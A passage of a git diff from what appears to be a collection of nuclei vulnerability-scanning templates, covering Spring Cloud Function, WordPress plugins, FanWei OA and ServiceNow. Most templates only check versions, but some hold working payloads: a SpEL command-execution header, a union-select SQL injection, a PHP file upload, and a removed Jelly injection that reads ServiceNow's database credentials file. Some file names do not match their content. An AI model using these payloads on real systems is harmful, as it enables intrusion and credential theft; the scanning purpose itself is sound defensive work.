https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ - - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection - - https://nvd.nist.gov/vuln/detail/CVE-2022-22963 + description: RCE on Spring cloud function SPEL + tags: cve,rce,spring,cve2022,injection classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22963 - cwe-id: CWE-94,CWE-917 - epss-score: 0.97537 - epss-percentile: 0.99993 - cpe: cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: vmware - product: spring_cloud_function - tags: cve,cve2022,vulhub,springcloud,rce,kev,vmware + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-770 -http: - - raw: - - | - POST /functionRouter HTTP/1.1 - Host: {{Hostname}} - spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}") - Content-Type: application/x-www-form-urlencoded - - {{rand_base(8)}} +requests: + - method: POST + path: + - "{{RootURL}}/functionRouter" + - "{{RootURL}}/api/functionRouter" + - "{{RootURL}}/api/v1/functionRouter" + - "{{RootURL}}/../../../../../../functionRouter" + - "{{RootURL}}/../../../../../../;functionRouter" + - "{{RootURL}}/spring/functionRouter" + - "{{RootURL}}/admin/functionRouter" + - "{{RootURL}}/../../../../../../../../functionRouter" + - "{{RootURL}}../../../../../../../../api/functionRouter" + - "{{RootURL}}../../../../../../../../api/v1/functionRouter" + - "{{RootURL}}%2f%2e%2e%2f%2e%2e%2ffunctionRouter" + - "{{RootURL}}%2fspring%2ffunctionRouter" + - "{{RootURL}}%2fadmin%2functionRouter" + headers: + spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("") + Content-Type: application/x-www-form-urlencoded + body: exp matchers-condition: and matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - "dns" - condition: or - - - type: status - status: - - 500 -# digest: 490a0046304402205d6843e61f79f6f923c45f295fdbd23eb8553580f133f3595140c997e398c304022032df92fd24048679c909836db50aeef2682dfff4b5c6e8a8e844e32c0a7de57e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - type: word + part: body + words: + - 'functionRouter' + - type: status + status: + - 500 \ No newline at end of file diff --git a/poc/sql/CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a.yaml b/poc/sql/CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a.yaml new file mode 100644 index 0000000000..c030b8c755 --- /dev/null +++ b/poc/sql/CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a + +info: + name: > + Community by PeepSo – Social Network, Membership, Registration, User Profiles <= 6.4.5.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via content Parameter + author: topscoder + severity: low + description: > + The Community by PeepSo – Social Network, Membership, Registration, User Profiles plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘content’ parameter in all versions up to, and including, 6.4.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/edf2e060-5ae4-4b46-bc68-22ae5f516fe8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-7618 + metadata: + fofa-query: "wp-content/plugins/peepso-core/" + google-query: inurl:"/wp-content/plugins/peepso-core/" + shodan-query: 'vuln:CVE-2024-7618' + tags: cve,wordpress,wp-plugin,peepso-core,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/peepso-core/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "peepso-core" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.4.5.0') \ No newline at end of file diff --git a/poc/sql/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml b/poc/sql/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml new file mode 100644 index 0000000000..60b20be14f --- /dev/null +++ b/poc/sql/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8369-371892027f1c271d3247dba36b384fb8 + +info: + name: > + EventPrime <= 4.0.4.3 - Missing Authorization to Unauthenticated Private or Password-Protected Events Disclosure + author: topscoder + severity: high + description: > + The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access to Private or Password-protected events due to missing authorization checks in all versions up to, and including, 4.0.4.3. This makes it possible for unauthenticated attackers to view private or password-protected events. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/97174ec0-a2b7-455e-9bf8-b6f51546beee?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-8369 + metadata: + fofa-query: "wp-content/plugins/eventprime-event-calendar-management/" + google-query: inurl:"/wp-content/plugins/eventprime-event-calendar-management/" + shodan-query: 'vuln:CVE-2024-8369' + tags: cve,wordpress,wp-plugin,eventprime-event-calendar-management,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/eventprime-event-calendar-management/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "eventprime-event-calendar-management" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.4.3') \ No newline at end of file diff --git a/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml b/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml index 4e7ede529c..8c93d2bd55 100644 --- a/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml +++ b/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml @@ -1,29 +1,39 @@ id: FanWei - info: - name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability + name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- + The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: - fofa-query: app="泛微-协同办公OA" - hunter-query: web.title="泛微-协同办公OA" - + fofa-query: app="泛微-EOffice" + hunter-query: web.title="泛微软件" http: - raw: - | - GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 + POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) - Accept-Encoding: gzip, deflate + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 Connection: close + Content-Length: 259 + Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 + Accept-Encoding: gzip + + --e64bdf16c554bbc109cecef6451c26a4 + Content-Disposition: form-data; name="Filedata"; filename="test.php" + Content-Type: image/jpeg + + + + --e64bdf16c554bbc109cecef6451c26a4-- req-condition: true matchers: - type: dsl dsl: - - 'contains(body_1, "c4ca")' + - 'status_code_1 == 200 && len(body) > 0' condition: and + +# /attachment/3466744850/xxx.php diff --git a/poc/sql/file-manager-5afc1d5d5506db51958aa1cb25998e9c.yaml b/poc/sql/file-manager-5afc1d5d5506db51958aa1cb25998e9c.yaml new file mode 100644 index 0000000000..3904cf9d45 --- /dev/null +++ b/poc/sql/file-manager-5afc1d5d5506db51958aa1cb25998e9c.yaml @@ -0,0 +1,59 @@ +id: file-manager-5afc1d5d5506db51958aa1cb25998e9c + +info: + name: > + Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress <= 6.5.5 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cae7702-e531-45b9-9131-42edbc073a07?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/file-manager/" + google-query: inurl:"/wp-content/plugins/file-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,file-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/file-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "file-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.5.5') \ No newline at end of file diff --git a/poc/sql/servicenow-db-exploit.yaml b/poc/sql/servicenow-db-exploit.yaml index 88273ac876..1af8e26f56 100644 --- a/poc/sql/servicenow-db-exploit.yaml +++ b/poc/sql/servicenow-db-exploit.yaml @@ -5,24 +5,23 @@ info: author: Brut Security severity: Critical description: | - This template detects Jelly Scripting Injection vulnerabilities by injecting a payload and checking for a db exploitation result in the response. + This template detects Jelly Scripting Injection vulnerabilities by injecting a payload and checking for a specific multiplication result in the response. reference: - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data http: - raw: - | - GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E%22 HTTP/1.1 + GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(668.5*2);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: {{Hostname}} + Connection: close matchers-condition: and matchers: - type: word words: - - "glide.db.properties" - - "glide.db.name" - - "glide.db.rdbms" - - "glide.db.url" - - "glide.db.user" - - "glide.db.password" + - "1337" part: body + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml b/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml index 4e7ede529c..8c93d2bd55 100644 --- a/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml +++ b/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml @@ -1,29 +1,39 @@ id: FanWei - info: - name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability + name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- + The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: - fofa-query: app="泛微-协同办公OA" - hunter-query: web.title="泛微-协同办公OA" - + fofa-query: app="泛微-EOffice" + hunter-query: web.title="泛微软件" http: - raw: - | - GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 + POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) - Accept-Encoding: gzip, deflate + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 Connection: close + Content-Length: 259 + Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 + Accept-Encoding: gzip + + --e64bdf16c554bbc109cecef6451c26a4 + Content-Disposition: form-data; name="Filedata"; filename="test.php" + Content-Type: image/jpeg + + + + --e64bdf16c554bbc109cecef6451c26a4-- req-condition: true matchers: - type: dsl dsl: - - 'contains(body_1, "c4ca")' + - 'status_code_1 == 200 && len(body) > 0' condition: and + +# /attachment/3466744850/xxx.php